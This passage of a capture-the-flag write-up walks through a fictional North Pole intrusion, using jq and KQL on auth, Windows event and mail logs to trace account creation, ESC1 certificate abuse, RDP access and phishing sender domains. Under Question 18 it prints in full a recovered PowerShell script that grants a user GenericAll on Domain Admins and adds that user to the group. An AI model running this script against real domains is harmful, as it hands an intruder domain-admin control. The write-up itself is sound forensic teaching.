<134>1 2024-09-16T10:59:46-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:46.121497-04:00", "hostname": "kringleSSleigH", "service": "useradd[6207]:", "message": "new user: name=ssdh, UID=1002, GID=1002, home=/home/ssdh, shell=/bin/bash, from=/dev/pts/6"}
<134>1 2024-09-16T10:59:48-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:48.583517-04:00", "hostname": "kringleSSleigH", "service": "passwd[6216]:", "message": "pam_unix(passwd:chauthtok): password changed for ssdh"}
<134>1 2024-09-16T10:59:50-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:50.560276-04:00", "hostname": "kringleSSleigH", "service": "chfn[6221]:", "message": "changed user 'ssdh' information"}
<134>1 2024-09-16T10:59:52-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:52.011557-04:00", "hostname": "kringleSSleigH", "service": "gpasswd[6236]:", "message": "members of group users set by root to kkringl315,pmacct,ssdh"}
<134>1 2024-09-16T11:00:14-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T14:00:14.317262-04:00", "hostname": "kringleSSleigH", "service": "sudo:", "message": " kkringl315 : TTY=pts/5 ; PWD=/opt ; USER=root ; COMMAND=/usr/sbin/usermod -a -G sudo ssdh"}
<134>1 2024-09-16T11:00:14-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T14:00:14.334393-04:00", "hostname": "kringleSSleigH", "service": "usermod[6263]:", "message": "add 'ssdh' to group 'sudo'"}
<134>1 2024-09-16T11:00:14-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T14:00:14.334752-04:00", "hostname": "kringleSSleigH", "service": "usermod[6263]:", "message": "add 'ssdh' to shadow group 'sudo'"}

The user is added to a few groups, including the sudo group at 14:00:14 with the command /usr/sbin/usermod -a -G sudo ssdh

Answer: /usr/sbin/usermod -a -G sudo ssdh

Question 14

The attacker enumerated Active Directory using a well known tool to map our Active Directory domain over LDAP. Submit the full ISO8601 compliant timestamp when the first request of the data collection attack sequence was initially recorded against the domain controller.

LDAP bind events are tracked as 2889. To find the first one, I’ll use head:

oxdf@hacky$ cat WindowsEvent.log | grep ' 2889,' | cut -d' ' -f8- | jq -c '. | select(.EventID == 2889)' | head -1 | jq .
{
  "LogName": "Directory Service",
  "Source": "Microsoft-Windows-ActiveDirectory_DomainService",
  "EventID": 2889,
  "Category": "LDAP Interface",
  "Level": "Information",
  "Keywords": "Classic",
  "Description": "The following client performed a SASL (Negotiate/Kerberos/NTLM/Digest) LDAP bind without requesting signing (integrity verification), or performed a simple bind over a clear text (non-SSL/TLS-encrypted) LDAP connection.",
  "Computer": "dc01.northpole.local",
  "ClientIPaddress": "172.24.25.22:18598",
  "ServicePort": 389,
  "ServiceName": "dc01.northpole.local",
  "ServiceIpAddress": "172.24.25.153",
  "UserID": "elf_user@northpole.local",
  "BindType": "0 - Simple Bind that does not support signing",
  "Date": "2024-09-16T11:10:12-04:00"
}

I could also find that with KQL: event_source: "WindowsEvent" and event.EventID: 2889. The first log has a timestamp I’ll have to convert back to ISO8601:

Answer: 2024-09-16T11:10:12-04:00

Question 15

The attacker attempted to perform an ADCS ESC1 attack, but certificate services denied their certificate request. Submit the name of the software responsible for preventing this initial attack.

Event ID 4888 is Certificate Serives denied a certificate request. KQL of event_source: "WindowsEvent" and event.EventID: 4888 finds one event:

jq locates the same record:

oxdf@hacky$ cat WindowsEvent.log | grep ' 4888,' | cut -d' ' -f8- | jq '. | select(.EventID == 4888)'
{
  "LogName": "Security",
  "Source": "Microsoft-Windows-Security-Auditing",
  "Date": "2024-09-16T11:14:12-04:00",
  "EventID": 4888,
  "Category": "Certification Services - Certificate Request Denied",
  "Level": "Information",
  "Keywords": "Audit Failure",
  "User": "N/A",
  "Computer": "dc01.northpole.local",
  "Description": "A certificate request was made for a certificate template, but the request was denied because it did not meet the criteria.",
  "UserInformation_UserName": "elf_user@northpole.local",
  "CertificateInformation_CertificateAuthority": "elf-dc01-SeaA",
  "CertificateInformation_RequestedTemplate": "Administrator",
  "ReasonForRejection": "KringleGuard EDR flagged the certificate request.",
  "AdditionalInformation_RequesterComputer": "10.12.25.24",
  "AdditionalInformation_RequestedUPN": "administrator@northpole.local"
}

Answer: KringleGuard

Questions 16-20

Question 16

We think the attacker successfully performed an ADCS ESC1 attack. Can you find the name of the user they successfully requested a certificate on behalf of?

Event ID 4886 is Certificate Services received a certificate request, and there’s one of these:

oxdf@hacky$ cat WindowsEvent.log | grep ' 4886,' | cut -d' ' -f8- | jq '. | select(.EventID == 4886)'
{
  "LogName": "Security",
  "Source": "Microsoft-Windows-Security-Auditing",
  "Date": "2024-09-16T11:15:12-04:00",
  "EventID": 4886,
  "Category": "Certification Services - Certificate Issuance",
  "Level": "Information",
  "Keywords": "Audit Success",
  "User": "N/A",
  "Computer": "dc01.northpole.local",
  "Description": "A certificate was issued to a user.",
  "UserInformation_UserName": "elf_user@northpole.local",
  "UserInformation_UPN": "nutcrakr@northpole.local",
  "CertificateInformation_CertificateAuthority": "elf-dc01-SeaA",
  "CertificateInformation_CertificateTemplate": "ElfUsers",
  "AdditionalInformation_RequesterComputer": "10.12.25.24",
  "AdditionalInformation_CallerComputer": "172.24.25.153"
}

It’s in ELK as well with event_source: "WindowsEvent" and event.EventID: 4886:

The UserInformation_UPN is the user for whom the certificate was requested.

Answer: nutcrakr

Question 17

One of our file shares was accessed by the attacker using the elevated user account (from the ADCS attack). Submit the folder name of the share they accessed.

Event ID 5140 is A network share object was accessed. I’ll search for that along with the nutcrakr user using event_source: "WindowsEvent" and event.EventID: 5140 and event.SubjectUserName: nutcrakr:

This returns seven logs. I can step through those, or see that the share name is held in event.ShareInformation_ShareName, and add that as a column from the left side:

Or, I could look from the terminal:

oxdf@hacky$ cat WindowsEvent.log | grep nutcrakr | cut -d' ' -f8- | jq -c '. | select(.EventID == 5140 and .SubjectUserName == "nutcrakr") | "[
\(.EventTime)] \(.ShareInformation_SharePath)"'
"[\n2024-09-16 11:18:43] \\??\\C:\\WishLists"
"[\n2024-09-16 11:35:58] \\??\\C:\\Windows\\SYSVOL\\sysvol"
"[\n2024-09-16 11:35:59] null"
"[\n2024-09-16 11:44:40] \\??\\C:\\Windows"
"[\n2024-09-16 11:44:40] \\??\\C:\\Windows"
"[\n2024-09-16 11:46:17] \\??\\C:\\Windows"
"[\n2024-09-16 11:53:12] \\??\\C:\\Windows\\SYSVOL\\sysvol"

The interesting one is the first one, WishLists.

Answer: WishLists

Question 18

The naughty attacker continued to use their privileged account to execute a PowerShell script to gain domain administrative privileges. What is the password for the account the attacker used in their attack payload?

I’ll take a look at the 4104 Windows PowerShell script block logging logs. There’s only one log with nutcrakr in it:

oxdf@hacky$ cat WindowsEvent.log | grep nutcrakr | cut -d' ' -f8- | jq -c '. | select(.EventID == 4104)' | jq .
{
  "MessageNumber": 1,
  "MessageTotal": 1,
  "ScriptBlockText": "Add-Type -AssemblyName System.DirectoryServices\n$ldapConnString = \"LDAP://CN=Domain Admins,CN=Users,DC=northpole,DC=local\"\n$username = \"nutcrakr\"\n$pswd = 'fR0s3nF1@k3_s'\n$nullGUID = [guid]'00000000-0000-0000-0000-000000000000'\n$propGUID = [guid]'00000000-0000-0000-0000-000000000000'\n$IdentityReference = (New-Object System.Security.Principal.NTAccount(\"northpole.local\\$username\")).Translate([System.Security.Principal.SecurityIdentifier])\n$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None\n$ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference, ([System.DirectoryServices.ActiveDirectoryRights] \"GenericAll\"), ([System.Security.AccessControl.AccessControlType] \"Allow\"), $propGUID, $inheritanceType, $nullGUID\n$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString, $username, $pswd\n$secOptions = $domainDirEntry.get_Options()\n$secOptions.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl\n$domainDirEntry.RefreshCache()\n$domainDirEntry.get_ObjectSecurity().AddAccessRule($ACE)\n$domainDirEntry.CommitChanges()\n$domainDirEntry.dispose()\n$ldapConnString = \"LDAP://CN=Domain Admins,CN=Users,DC=northpole,DC=local\"\n$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString, $username, $pswd\n$user = New-Object System.Security.Principal.NTAccount(\"northpole.local\\$username\")\n$sid=$user.Translate([System.Security.Principal.SecurityIdentifier])\n$b=New-Object byte[] $sid.BinaryLength\n$sid.GetBinaryForm($b,0)\n$hexSID=[BitConverter]::ToString($b).Replace('-','')\n$domainDirEntry.Add(\"LDAP://<SID=$hexSID>\")\n$domainDirEntry.CommitChanges()\n$domainDirEntry.dispose()",
  "ScriptBlockId": "{01bbe2da-58c3-4490-aa52-682dbae233a3}",
  "Path": "",
  "Provider_Name": "Microsoft-Windows-PowerShell",
  "Provider_Guid": "{a0c1853b-5c40-4b15-8766-3cf1c58f985a}",
  "EventID": 4104,
  "Version": 1,
  "Level": 5,
  "Task": 2,
  "Opcode": 15,
  "Keywords": "0x0",
  "TimeCreated_SystemTime": "2024-09-16T11:33:12-04:00",
  "EventRecordID": 54059,
  "Correlation_ActivityID": "{17aa0df9-5d3d-46e9-bce0-55b7a5be4b43}",
  "ParentProcessID": 928,
  "ThreadID": 4896,
  "Channel": "Microsoft-Windows-PowerShell/Operational",
  "Computer": "SleighRider.northpole.local",
  "Security_UserID": "S-1-5-21-3699322559-1991583901-1175093138-1110"
}

The script is:

Add-Type -AssemblyName System.DirectoryServices
$ldapConnString = "LDAP://CN=Domain Admins,CN=Users,DC=northpole,DC=local"
$username = "nutcrakr"
$pswd = 'fR0s3nF1@k3_s'
$nullGUID = [guid]'00000000-0000-0000-0000-000000000000'
$propGUID = [guid]'00000000-0000-0000-0000-000000000000'
$IdentityReference = (New-Object System.Security.Principal.NTAccount("northpole.local\$username\")).Translate([System.Security.Principal.SecurityIdentifier])
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None
$ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference, ([System.DirectoryServices.ActiveDirectoryRights] "GenericAll"), ([System.Security.AccessControl.AccessControlType] "Allow"), $propGUID, $inheritanceType, $nullGUID
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString, $username, $pswd
$secOptions = $domainDirEntry.get_Options()
$secOptions.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl
$domainDirEntry.RefreshCache()
$domainDirEntry.get_ObjectSecurity().AddAccessRule($ACE)
$domainDirEntry.CommitChanges()
$domainDirEntry.dispose()
$ldapConnString = "LDAP://CN=Domain Admins,CN=Users,DC=northpole,DC=local"
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString, $username, $pswd
$user = New-Object System.Security.Principal.NTAccount("northpole.local\\$username")
$sid=$user.Translate([System.Security.Principal.SecurityIdentifier])
$b=New-Object byte[] $sid.BinaryLength
$sid.GetBinaryForm($b,0)
$hexSID=[BitConverter]::ToString($b).Replace('-','')
$domainDirEntry.Add("LDAP://<SID=$hexSID>")
$domainDirEntry.CommitChanges()
$domainDirEntry.dispose()

It’s using the password “fR0s3nF1@k3_s” to connect to AD and make changes.

Answer: fR0s3nF1@k3_s

Question 19

The attacker then used remote desktop to remotely access one of our domain computers. What is the full ISO8601 compliant UTC EventTime when they established this connection?

Login events are logged as 4624, which includes a Logon Type. 10 is RemoteInteractive, which is what is logged for RDP connections. Searching for those, there’s one:

oxdf@hacky$ cat WindowsEvent.log | grep ' 4624,' | cut -d' ' -f8- | jq -c '. | select(.EventID == 4624 and .LogonInformation_LogonType == 10)' | jq .
{
  "EventTime": "2024-09-16 11:35:57",
  "Hostname": "dc01.northpole.local",
  "Keywords": -9214364837600034816,
  "EventType": "AUDIT_SUCCESS",
  "SeverityValue": 2,
  "Severity": "INFO",
  "EventID": 4624,
  "SourceName": "Microsoft-Windows-Security-Auditing",
  "ProviderGuid": "{54849625-5478-4994-A5BA-3E3B0328C30D}",
  "Version": 2,
  "Task": 12544,
  "OpcodeValue": 0,
  "RecordNumber": 530313,
  "ActivityID": "{D72392BD-843F-0000-1F93-23D73F84DA01}",
  "ProcessID": 704,
  "ThreadID": 1124,
  "Channel": "Security",
  "Category": "Logon",
  "Opcode": "Info",
  "SubjectUserSid": "S-1-5-18",
  "SubjectUserName": "DC01$",
  "SubjectDomainName": "NORTHPOLE",
  "SubjectLogonId": "0x3e7",
  "TargetUserSid": "S-1-5-21-3699322559-1991583901-1175093138-1112",
  "TargetUserName": "nutcrakr",
  "TargetDomainName": "NORTHPOLE",
  "TargetLogonId": "0xdd425e",
  "LogonType": 10,
  "LogonProcessName": "User32 ",
  "AuthenticationPackageName": "Negotiate",
  "WorkstationName": "DC01",
  "LogonGuid": "{00000000-0000-0000-0000-000000000000}",
  "TransmittedServices": "-",
  "LmPackageName": "-",
  "KeyLength": 0,
  "ProcessName": "C:\\Windows\\System32\\svchost.exe",
  "IpAddress": "10.12.25.24",
  "IpPort": 0,
  "ImpersonationLevel": "%%1833",
  "RestrictedAdminMode": "%%1843",
  "TargetOutboundUserName": "-",
  "TargetOutboundDomainName": "-",
  "VirtualAccount": "%%1843",
  "TargetLinkedLogonId": "0xdd41af",
  "ElevatedToken": "%%1843",
  "EventReceivedTime": "2024-09-16T11:35:57-04:00",
  "SourceModuleName": "inSecurityEvent",
  "SourceModuleType": "im_msvistalog",
  "Subject_SecurityID": "S-1-5-18",
  "Subject_AccountName": "DC01$",
  "Subject_AccountDomain": "NORTHPOLE",
  "Subject_LogonID": "0x3E7",
  "LogonInformation_LogonType": 10,
  "LogonInformation_RestrictedAdminMode": "No",
  "LogonInformation_VirtualAccount": "No",
  "LogonInformation_ElevatedToken": "No",
  "NewLogon_SecurityID": "S-1-5-21-3699322559-1991583901-1175093138-1112",
  "NewLogon_AccountName": "nutcrakr",
  "NewLogon_AccountDomain": "NORTHPOLE",
  "NewLogon_LogonID": "0xDD425E",
  "NewLogon_LinkedLogonID": "0xDD41AF",
  "NewLogon_NetworkAccountName": "-",
  "NewLogon_NetworkAccountDomain": "-",
  "NewLogon_LogonGUID": "{00000000-0000-0000-0000-000000000000}",
  "ProcessInformation_ProcessID": "0x994",
  "ProcessInformation_ProcessName": "C:\\Windows\\System32\\svchost.exe",
  "NetworkInformation_WorkstationName": "DC01",
  "NetworkInformation_SourceNetworkAddress": "10.12.25.24",
  "NetworkInformation_SourcePort": 0,
  "DetailedAuthenticationInformation_LogonProcess": "User32",
  "DetailedAuthenticationInformation_AuthenticationPackage": "Negotiate",
  "DetailedAuthenticationInformation_TransitedServices": "-",
  "DetailedAuthenticationInformation_PackageNameNTLMonly": "-",
  "DetailedAuthenticationInformation_KeyLength": 0,
  "MoreDetails": "An account was successfully logged on.\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\nThe authentication information fields provide detailed information about this specific logon request.\n- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\n- Transited services indicate which intermediate services have participated in this logon request.\n- Package name indicates which sub-protocol was used among the NTLM protocols.\n- Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
}

In KQL, the query is event_source: "WindowsEvent" and event.EventID: 4624 and event.LogonType: 10.

I’ll generate the ISO8601 timestamp from the EventTime field.

Answer: 2024-09-16T15:35:57.000Z

Question 20

The attacker is trying to create their own naughty and nice list! What is the full file path they created using their remote desktop connection?

I’m looking for file creation events on the DC (where the RDP session is), but searching for Sysmon event 11 doesn’t find anything useful.

I’ll look at processes run by nutcrakr after the RDP login on the DC. I’ll need to subtract four hours from the time to go from UTC to local time which the .EventTime field is using:

oxdf@hacky$ cat WindowsEvent.log | grep nutcrakr | cut -d' ' -f8- | jq '. | select(.EventID == 1 and .Hostname == "dc01.northpole.local" and .User == "NORTHPOLE\\nutcrakr" and .EventTime > "2024-09-16 11:35:56") | "[\(.EventTime)] \(.CommandLine) - \(.ParentCommandLine)"'
"[2024-09-16 11:35:59] C:\\Windows\\system32\\TSTheme.exe -Embedding - C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p"
"[2024-09-16 11:35:59] rdpclip - C:\\Windows\\System32\\svchost.exe -k termsvcs -s TermService"
"[2024-09-16 11:35:59] sihost.exe - C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s UserManager"
"[2024-09-16 11:35:59] C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup -s CDPUserSvc - C:\\Windows\\system32\\services.exe"
"[2024-09-16 11:35:59] C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup -s WpnUserService - C:\\Windows\\system32\\services.exe"
"[2024-09-16 11:35:59] taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E} - C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"
"[2024-09-16 11:35:59] taskhostw.exe USER - C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"
"[2024-09-16 11:35:59] taskhostw.exe - C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"
"[2024-09-16 11:35:59] C:\\Windows\\system32\\ServerManagerLauncher.exe - C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"
"[2024-09-16 11:35:59] C:\\Windows\\system32\\userinit.exe - winlogon.exe"
"[2024-09-16 11:36:00] C:\\Windows\\Explorer.EXE - C:\\Windows\\system32\\userinit.exe"
"[2024-09-16 11:36:00] C:\\Windows\\System32\\smartscreen.exe -Embedding - C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p"
"[2024-09-16 11:36:01] \"C:\\Windows\\System32\\unregmp2.exe\" /FirstLogon - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:36:01] \"C:\\Windows\\System32\\ie4uinit.exe\" -UserConfig - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:36:01] C:\\Windows\\System32\\ie4uinit.exe -ClearIconCache - \"C:\\Windows\\System32\\ie4uinit.exe\" -UserConfig"
"[2024-09-16 11:36:01] rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh - C:\\Windows\\system32\\svchost.exe -k wsappx -p -s AppXSvc"
"[2024-09-16 11:36:01] \"ctfmon.exe\" - C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p -s TabletInputService"
"[2024-09-16 11:36:01] C:\\Windows\\system32\\RunDll32.exe C:\\Windows\\system32\\migration\\WininetPlugin.dll,MigrateCacheForUser /m /0 - C:\\Windows\\System32\\ie4uinit.exe -ClearIconCache"
"[2024-09-16 11:36:02] \"C:\\Windows\\System32\\unregmp2.exe\" /FirstLogon - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:36:03] \"C:\\Windows\\System32\\rundll32.exe\" \"C:\\Windows\\System32\\iesetup.dll\",IEHardenAdmin - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:36:03] \"C:\\Windows\\System32\\rundll32.exe\" \"C:\\Windows\\System32\\iesetup.dll\",IEHardenUser - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:36:05] \"C:\\Windows\\system32\\ServerManager.exe\"  - C:\\Windows\\system32\\ServerManagerLauncher.exe"
"[2024-09-16 11:36:05] \"C:\\Windows\\system32\\ServerManager.exe\"  - C:\\Windows\\system32\\ServerManagerLauncher.exe"
"[2024-09-16 11:36:06] C:\\Windows\\system32\\SettingSyncHost.exe -Embedding - C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p"
"[2024-09-16 11:36:07] \"C:\\Windows\\System32\\fsquirt.exe\" -Register - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:36:17] \"C:\\Windows\\System32\\SecurityHealthSystray.exe\"  - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:36:17] \"C:\\Windows\\System32\\vm3dservice.exe\" -u - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:36:18] \"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\" -n vmusr - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:36:23] C:\\Windows\\System32\\rundll32.exe C:\\Windows\\System32\\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding - C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p"
"[2024-09-16 11:36:28] \"C:\\Windows\\system32\\NOTEPAD.EXE\" C:\\WishLists\\santadms_only\\its_my_fakelst.txt - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:36:35] rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh - C:\\Windows\\system32\\svchost.exe -k wsappx -p -s AppXSvc"
"[2024-09-16 11:38:10] \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:40:09] C:\\Windows\\system32\\ApplicationFrameHost.exe -Embedding - C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p"
"[2024-09-16 11:41:38] \"C:\\Users\\nutcrakr\\Desktop\\getthelist\\howtosavexmas.pdf.exe\"  - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:46:17] C:\\Windows\\system32\\TSTheme.exe -Embedding - C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p"
"[2024-09-16 11:46:17] taskhostw.exe KEYROAMING - C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"
"[2024-09-16 11:51:00] taskhostw.exe Install $(Arg0) - C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"

A lot of these at the top are the RDP session starting. Then there’s this:

"[2024-09-16 11:36:28] \"C:\\Windows\\system32\\NOTEPAD.EXE\" C:\\WishLists\\santadms_only\\its_my_fakelst.txt - C:\\Windows\\Explorer.EXE"

It’s notepad.exe trying to edit its_my_fakelst.txt:

Answer: C:\WishLists\santadms_only\its_my_fakelst.txt

Questions 21-24

Question 21

The Wombley faction has user accounts in our environment. How many unique Wombley faction users sent an email message within the domain?

I need way to identify what makes a “Wombley faction user”. I’ll note I’m looking for “from” addresses here.

There are 571 unique from addresses:

oxdf@hacky$ cat SnowGlowMailPxy.log | cut -d' ' -f8- | jq -r '.From' | sort -u | wc -l
571

If I filter to just get the @northpole.local emails, it drops to 21:

oxdf@hacky$ cat SnowGlowMailPxy.log | cut -d' ' -f8- | jq -r '. | select(.From | endswith("@northpole.local")) | .From' | sort -u | wc -l
21
oxdf@hacky$ cat SnowGlowMailPxy.log | cut -d' ' -f8- | jq -r '. | select(.From | endswith("@northpole.local")) | .From' | sort -u 
asnowball04@northpole.local
asnowball_05@northpole.local
asnowball08@northpole.local
asnowball09@northpole.local
elf_user00@northpole.local
elf_user01@northpole.local
elf_user02@northpole.local
elf_user03@northpole.local
elf_user04@northpole.local
elf_user05@northpole.local
elf_user06@northpole.local
elf_user07@northpole.local
elf_user08@northpole.local
elf_user09@northpole.local
elf_user10@northpole.local
elf_user11@northpole.local
kriskring1e@northpole.local
wcub101@northpole.local
wcub303@northpole.local
wcub808@northpole.local
wcube311@northpole.local

There are four users with emails starting with “wcub”, which solves the question.

Answer: 4

Question 22

The Alabaster faction also has some user accounts in our environment. How many emails were sent by the Alabaster users to the Wombley faction users?

From the analysis above, it seems like Alabaster users likely start with “asnowball”. jq can handle this:

oxdf@hacky$ cat SnowGlowMailPxy.log | cut -d' ' -f8- | jq -rc '. | select((.From | startswith("asnowball")) and (.To | startswith("wcub")))' | wc -l
22
oxdf@hacky$ cat SnowGlowMailPxy.log | cut -d' ' -f8- | jq -rc '. | select((.From | startswith("asnowball")) and (.To | startswith("wcub"))) | "\(.From) --> \(.To): \(.Subject)"'
asnowball_05@northpole.local --> wcub303@northpole.local: Travel Arrangements - Urgent
asnowball_05@northpole.local --> wcub808@northpole.local: Performance Reviews and Development Opportunities
asnowball_05@northpole.local --> wcube311@northpole.local: Health and Safety Updates: Ensuring a Secure Work Environment
asnowball09@northpole.local --> wcub808@northpole.local: Urgent Supply Chain Update
asnowball08@northpole.local --> wcub303@northpole.local: Training Opportunities at The North Pole
asnowball09@northpole.local --> wcub808@northpole.local: Upcoming Meeting Schedules - Action Required
asnowball09@northpole.local --> wcub303@northpole.local: Office Relocations Update
asnowball09@northpole.local --> wcube311@northpole.local: Retirement Announcements
asnowball08@northpole.local --> wcube311@northpole.local: Market Trends Update
asnowball08@northpole.local --> wcub303@northpole.local: Office Relocations Update
asnowball09@northpole.local --> wcub303@northpole.local: Urgent Supply Chain Update
asnowball04@northpole.local --> wcub101@northpole.local: Inventory Levels Update
asnowball09@northpole.local --> wcub808@northpole.local: Inventory Levels Update
asnowball09@northpole.local --> wcub808@northpole.local: Access Request Approval
asnowball08@northpole.local --> wcub808@northpole.local: Inventory Levels Update
asnowball04@northpole.local --> wcub101@northpole.local: No Subject
asnowball09@northpole.local --> wcub101@northpole.local: No Subject
asnowball_05@northpole.local --> wcub808@northpole.local: Budget Approvals
asnowball09@northpole.local --> wcub808@northpole.local: Re: Sustainability Initiatives at The North Pole
asnowball08@northpole.local --> wcub101@northpole.local: Team Assignments
asnowball08@northpole.local --> wcub101@northpole.local: Christmas Wish List Analysis and Insights
asnowball04@northpole.local --> wcube311@northpole.local: Office Relocations Update

Answer: 22

Question 23

Of all the reindeer, there are only nine. What’s the full domain for the one whose nose does glow and shine? To help you narrow your search, search the events in the ‘SnowGlowMailPxy’ event source.

I’ll look at users where “rudolph” is in the sender:

oxdf@hacky$ cat SnowGlowMailPxy.log | cut -d' ' -f8- | jq -rc '. | select(.From | ascii_downcase | contains("rudolph")) | "\(.From) --> \(.To): \(.Subject)"'
RudolphRunner@gingerlane.dancer --> asnowball09@northpole.local: Upcoming Software Updates
RudolphRunner@pr4nc3r.trot --> asnowball09@northpole.local: Welcome to The North Pole - New Hire Introductions
RudolphRunner@evergreen.tree --> wcube311@northpole.local: Budget Approvals Request
RudolphRunner@blizzard.north --> elf_user10@northpole.local: Access Request for [recipient]
RudolphRunner@pine.tree --> asnowball08@northpole.local: Office Relocation Update
RudolphRunner@nogfest.eggnog --> asnowball08@northpole.local: Christmas Wish List Analysis
RudolphRunner@stocking.chimney --> asnowball08@northpole.local: Team Assignments for Project X
RudolphRunner@snowdrift.globe --> elf_user00@northpole.local: Regulatory Compliance Update
RudolphRunner@sleigh.ride --> elf_user03@northpole.local: Access Request for [recipient]
RudolphRunner@santa.hut --> elf_user07@northpole.local: No Subject
RudolphRunner@reindeers.fly --> elf_user09@northpole.local: Diversity and Inclusion Initiatives
RudolphRunner@candycane.factory --> asnowball08@northpole.local: Upcoming Competitor Analysis - Your Valuable Insights Requested
RudolphRunner@wicked.snow --> elf_user04@northpole.local: Team Assignments - Urgent
RudolphRunner@bells.ring --> wcub101@northpole.local: Policy Changes at The North Pole
RudolphRunner@mistlebranch.vixen --> asnowball09@northpole.local: Office Relocations Update
RudolphRunner@rud01ph.glow --> elf_user05@northpole.local: Diversity and Inclusion Initiatives at The North Pole
RudolphRunner@cheery.fireplace --> elf_user00@northpole.local: No Subject

The second to last one has “rud01ph” in the domain, and that’s it.

Answer: rud01ph.glow

Question 24

With a fiery tail seen once in great years, what’s the domain for the reindeer who flies without fears? To help you narrow your search, search the events in the ‘SnowGlowMailPxy’ event source.

According to Wikipedia, Fearless is one of the ten reindeer in L. Frank Baum’s “The Life and Adventures of Santa Claus”. But there’s no sign of a reindeer named Fearless in the data, and the previous question said explicitly there are nine.

The “fiery tail” sounds like Comet. I’ll look at the sending domains:

oxdf@hacky$ cat SnowGlowMailPxy.log | cut -d' ' -f8- | jq -r '.From' | cut -d'@' -f2 | sort -u
bells.ring
blizzard.north
c0m3t.halleys
candycane.factory
cheery.fireplace
elf.toyshop
evergreen.tree
frosty.north
gingerbread.house
gingerlane.dancer
ginger.snap
holly.jolly
icicle.light
jolly.jingle
merry.elves
mistlebranch.vixen
nogfest.eggnog
northpole.local
northstar.nibbles
nutcracker.tale
pine.tree
pr4nc3r.trot
reindeer.corral
reindeers.fly
rud01ph.glow
santa.hut
sleigh.ride
snowdrift.globe
snowflakekingdom.chill
snowflake.spark
snowy.land
starlight.tree
stocking.chimney
tinsel.town
tinsel.wrap
toytinkers.land
twilight.star
twinkle.light
wicked.snow
wreath.maker
yule.log

Towards the top is c0m3t.halleys.

Answer: c0m3t.halleys

Outro

Fitzy is shocked:

Fitzy Shortstack

Unbelievable! You dissected the attack chain using advanced analysis—impressive work! With determination like yours, we might just fix the mess and get Santa smiling again.

Bravo! You pieced it all together, uncovering the attack path. Santa’s gonna be grateful for your quick thinking and tech savvyness. The North Pole owes you big time!

Santa is relieved as well:

Santa

Wonderful! Now we have a much better idea of how that pesky ransomware made its way onto the file share. We’re one step closer to getting the Naughty-Nice List back.

Alabaster is amazed:

Alabaster Snowball

You continue to amaze! Now that you’ve investigated with Elf Stack and solved the case, we’re one step closer to recovering the Naughty-Nice List.

Wombley warns there’s more to come:

Wombley Cube

Great work, but successfully investigating our attack chain is only the first step.

« Santa Vision Frostbit »